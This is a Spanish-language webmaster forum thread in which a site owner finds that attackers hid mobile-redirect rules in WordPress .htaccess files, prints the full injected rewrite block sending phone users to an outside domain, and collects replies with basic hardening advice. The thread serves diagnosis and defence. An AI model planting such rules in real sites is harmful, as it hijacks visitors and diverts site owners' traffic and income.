Redirección móvil inesperada en mis sitios web ¿Vulnerabilidad?

  • Autor Autor jvelazquez
  • Fecha de inicio Fecha de inicio
J

jvelazquez

Beta
Social Media
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Hola chicos, no sé si a alguien le ha pasado, he buscado por el foro y no he encontrado nada similar, os cuento...

Hace cosa de unas semanas empecé a notar una decaída notable de las ganancias en mis sitios web, buscando una solución cambiando espacios publicitarios y demás, me preguntaba como era posible que con las mismas visitas hubiera menos impresiones y evidentemente clics, la siguiente semana empezaron a bajarme un poco las visitas sobretodo de móvil, me da por entrar y me encuentro una redirección móvil a googleframe.net/earssp.cgi, pensando que era una redirección de una empresa de publicidad, reviso los códigos y no encuentro nada en los códigos de publi, de hecho quito la publicidad y sigue la redirección, empiezo a investigar más a fondo y me encuentro con un dato curioso, el archivo htaccess de wordpress pesaba casi 2mb, algo inusual con un archivo de texto y apenas 4 líneas ligeras de texto, abro el archivo y no veo nada raro, tras vuelta y vuelta veo en el archivo que tiene la barra lateral, la bajo y me encuentro con esto...



Insertar CODE, HTML o PHP: 
RewriteEngine on

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "symbian|iOS|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://6.moby24.com [L,R=302]

Han metido una redirección móvil en mi htaccess además los permisos estaban a 755, en lugar de estar a 644, investigando más a fondo me encuentro un archivo llamado PrVerivy.txt (un archivo de verificación de propiedad con un meta de la publi).

Bueno pensando que se habían colado y ya, lo modifico todo en TODOS los sitios web que tengo en el alojamiento (más de 20) y cual es mi sorpresa? Me meto ahora con el móvil y otra vez modificado a fecha del mismo día pero un par de horas de modificar yo los archivos, lo he vuelto a modificar todo y cambiado todas las contraseñas, ahora a esperar a vr si vuelven a hacer algo...

Alguien le ha pasado? Alguna recomendación de seguridad? Añado que uno de los sitios web está hecho con moviescript por lo que descarto que sea un bug único de wordpress.
 
Será un BUG ?
 
si usas worpress, o script propio puede ser que algun archivo php este con permisos 777 donde ahi se puede inyectar codigos para poder hacer cambios en tu web verifica que esten con los permisos correctos.
Si todo esta bien puede ser que en tu pc este infectado y al usar algun programa ftp estes pasando virus a tu hosting.
Suerte
 
Nombre de la pagina web [MENTION=37885]jvelazquez[/MENTION]? 😛anda:
 
Última edición:
1- ¿En que empresa de hosting estas? Reporta esto con tu empresa de hosting.
2- Los plugins de wordpress pueden modificar el htacces y modificar archivos así que chequea que todo este bien.
3- Los themes NULLED tienden a tener este tipo de back doors para hacer modificaciones a las webs, intenta tener todo original.

Espero ayudarte, espero tu respuesta. :encouragement:
 
He instalado el plugin antimalware pero al realizar el scan el servidor bloquea mi ip por seguridad, sobre los themes y plugins nulled, tenía el itouch pro pero lo quité al cambiar la plantilla por una responsive por lo que no tengo nada en la actualidad, pasé el antimalware desde el cpanel y me detectó un archivo malicioso en el plugin slideshow, lo desactive, eliminé los archivo y ya está.

De momento estoy encima de las webs desde ayer y todo parece normal, ya os iré informando.

- - - Actualizado - - -

Confirmo que me han vuelto a hackear, estoy desesperado, no sé que más hacer ya, he probado las soluciones dichas arriba, el plugin ese y nada, vuelven a caer 😡
 
Bueno mi website tiene ese problema cuando entro por el cell podrían ayudarme o decirme que hicieron para solucionarlo
Gracias,
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

Cicklow
Tutorial: Alternativa a la redirección móvil
22 23 24
Respuestas
472
Visitas
63K
Coloradoo
Coloradoo
Atrás
Arriba